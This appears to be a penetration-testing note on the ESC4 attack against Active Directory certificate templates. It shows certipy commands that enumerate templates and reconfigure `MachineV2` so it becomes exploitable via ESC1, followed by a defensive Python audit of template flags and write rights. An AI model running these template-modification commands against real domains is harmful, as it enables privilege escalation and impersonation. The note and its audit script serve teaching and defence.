ESC4
The attack is possible when a compromised user or computer holds modify rights (Write*, FullControl, etc.) over a certificate template. For instance, suppose you have compromised a user called `certsvc` that has FullControl over the certificate template `MachineV2`. This lets `certsvc` change the template configuration so that it becomes vulnerable to ESC1.
- The template configuration can be enumerated with certipy:

```
certipy find -u certsvc@range.local -p Password1234 -dc-ip 10.10.10.10 -stdout -vulnerable -enabled
```

Note:
- `-enabled` only lists enabled templates, which is useful here to skip templates that are not usable.
- `-vulnerable` only lists templates certipy detects as vulnerable; this is not recommended because it can produce false positives.
- `-stdout` prints the output to stdout instead of writing it to a file. To generate BloodHound-compatible output, use the `-bloodhound` flag instead.
- Proceed with the ESC4 exploit by changing the template configuration. The settings that matter are:

| Attribute | Value |
|---|---|
| msPKI-Certificate-Name-Flag | (0x1) ENROLLEE_SUPPLIES_SUBJECT |
| ManageApproval | false |

```
certipy template -dc-ip 10.10.10.10 -u certsvc@range.local -p 'f@rdanojano' -template MachineV2 -target CA.range.local -save-old
```

`-save-old` keeps a copy of the original template configuration so it can be restored afterwards.

- The template is now vulnerable to ESC1.
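As an added defender-side example (not part of this note and not certipy's own code), the following audit decodes the two template attributes the ESC4 edit touches, diffs a saved snapshot against the current template to catch the change, and lists principals with modify rights that are outside a trusted set. The template records and ACL entries are constructed samples modelled on `MachineV2` and `certsvc`; the right names in the ACL sample are hypothetical labels, while the flag bit values come from MS-CRTD.

```python
# Bit values from MS-CRTD (Microsoft certificate template specification).
ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag: requester picks the subject
PEND_ALL_REQUESTS = 0x2           # msPKI-Enrollment-Flag: CA manager approval required

# Hypothetical right labels for the ACL sample; real tooling uses its own names.
WRITE_RIGHTS = {"FullControl", "WriteDacl", "WriteOwner", "WriteProperty"}
WATCHED = ("msPKI-Certificate-Name-Flag", "msPKI-Enrollment-Flag")


def exposed_to_esc1(template):
    """True when an enabled template lets the requester choose the subject
    and no manager approval is required (the state an ESC4 edit produces)."""
    name_flag = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flag = template.get("msPKI-Enrollment-Flag", 0)
    return (template.get("enabled", False)
            and bool(name_flag & ENROLLEE_SUPPLIES_SUBJECT)
            and not (enroll_flag & PEND_ALL_REQUESTS))


def template_drift(saved, current, watched=WATCHED):
    """Compare a saved snapshot of a template with its current state and
    return each watched attribute that changed as (attribute, old, new)."""
    return [(a, saved.get(a), current.get(a))
            for a in watched if saved.get(a) != current.get(a)]


def risky_writers(aces, trusted=("Domain Admins", "Enterprise Admins")):
    """Principals holding a modify right on the template that are not in
    the trusted set; these are the ESC4 candidates to review."""
    return sorted({p for p, right in aces
                   if right in WRITE_RIGHTS and p not in trusted})


# Constructed sample: the template before and after the configuration change.
MACHINEV2_BEFORE = {"name": "MachineV2", "enabled": True,
                    "msPKI-Certificate-Name-Flag": 0x0,
                    "msPKI-Enrollment-Flag": PEND_ALL_REQUESTS}
MACHINEV2_AFTER = {"name": "MachineV2", "enabled": True,
                   "msPKI-Certificate-Name-Flag": ENROLLEE_SUPPLIES_SUBJECT,
                   "msPKI-Enrollment-Flag": 0x0}
# Constructed sample ACL: (principal, right) pairs on the template object.
SAMPLE_ACES = [("Domain Admins", "FullControl"),
               ("certsvc", "FullControl"),
               ("Domain Computers", "Enroll")]

if __name__ == "__main__":
    print("exposed before:", exposed_to_esc1(MACHINEV2_BEFORE))
    print("exposed after: ", exposed_to_esc1(MACHINEV2_AFTER))
    print("drift:", template_drift(MACHINEV2_BEFORE, MACHINEV2_AFTER))
    print("risky writers:", risky_writers(SAMPLE_ACES))
```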